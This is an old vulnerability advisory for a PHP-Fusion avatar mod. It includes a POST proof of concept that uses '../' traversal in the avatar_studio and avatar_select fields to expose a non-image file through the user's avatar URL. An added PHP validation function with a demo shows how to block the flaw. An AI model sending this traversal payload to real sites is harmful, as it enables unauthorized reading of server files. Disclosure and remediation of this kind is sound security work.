
# Title : PHP-Fusion Mod avatar_studio LFI
# Published : 2009-12-30
# Author : bonobug


# Tested on: Spanish version

By modifying the "avatar_studio" parameter in the POST data sent to avatar_studio.php, you can retrieve all images in that directory.
Also, using "avatar_select" you can set a file as your own avatar, which may not be a .jpg.

Proof of concept:

POST /infusions/avatar_studio/avatar_studio.php HTTP/1.1
...
Headers
...
Content-Length: XX

avatar_studio=../../../../../data&avatar_select=data.txt&avatar_save=Salvar+Avatar

(The avatar_save value "Salvar Avatar" is Spanish for 'Save avatar'.)

If you try to access a non-existent directory, it returns a PHP error.
If the file does exist, it loads as normal.

Once you have modified your avatar, you can access it using your "user id" at:
http://www.xxxxxxxxxxxxx.com/images/avatars/avatar[YOURUSERID].EXTENSION
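
One way a handler could validate "avatar_studio" and "avatar_select" before touching the filesystem, so that neither the directory traversal nor the non-image file is accepted. This is an added example in PHP, not code from the mod or from the advisory's author; the function name, the extension allow-list and the demo directory layout are assumptions.

```php
<?php
// Added example, not avatar_studio's code. Function name, allow-list and
// directory layout are assumptions made for illustration.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

// Returns the resolved path of an avatar inside $base, or null if rejected.
function resolve_studio_avatar(string $base, string $dir, string $file): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // avatar_select must be a bare file name; neither value may carry NUL bytes.
    if ($file === '' || $file !== basename($file) || strpos($dir . $file, "\0") !== false) {
        return null;
    }
    // Extension allow-list: covers the "may not be .jpg" case.
    $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // realpath() collapses "../" and symlinks; false means nothing exists there.
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $dir . DIRECTORY_SEPARATOR . $file);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Containment: the resolved path must still sit under the base directory.
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo tree under the system temp directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'avatar_demo_' . bin2hex(random_bytes(4));
mkdir("$root/studio/set1", 0700, true);
mkdir("$root/data", 0700, true);
foreach (['studio/set1/face.jpg', 'data/data.txt', 'data/other.jpg'] as $f) {
    file_put_contents("$root/$f", 'constructed');
}
$cases = [['set1', 'face.jpg'], ['../data', 'data.txt'], ['../data', 'other.jpg']];
foreach ($cases as [$dir, $file]) {
    $ok = resolve_studio_avatar("$root/studio", $dir, $file) !== null;
    printf("%-10s %-10s %s\n", $dir, $file, $ok ? 'accepted' : 'rejected');
}
```

Only the first constructed case is accepted. The third case has an allowed extension and is rejected by the containment check alone, which is why the extension test cannot stand in for path resolution.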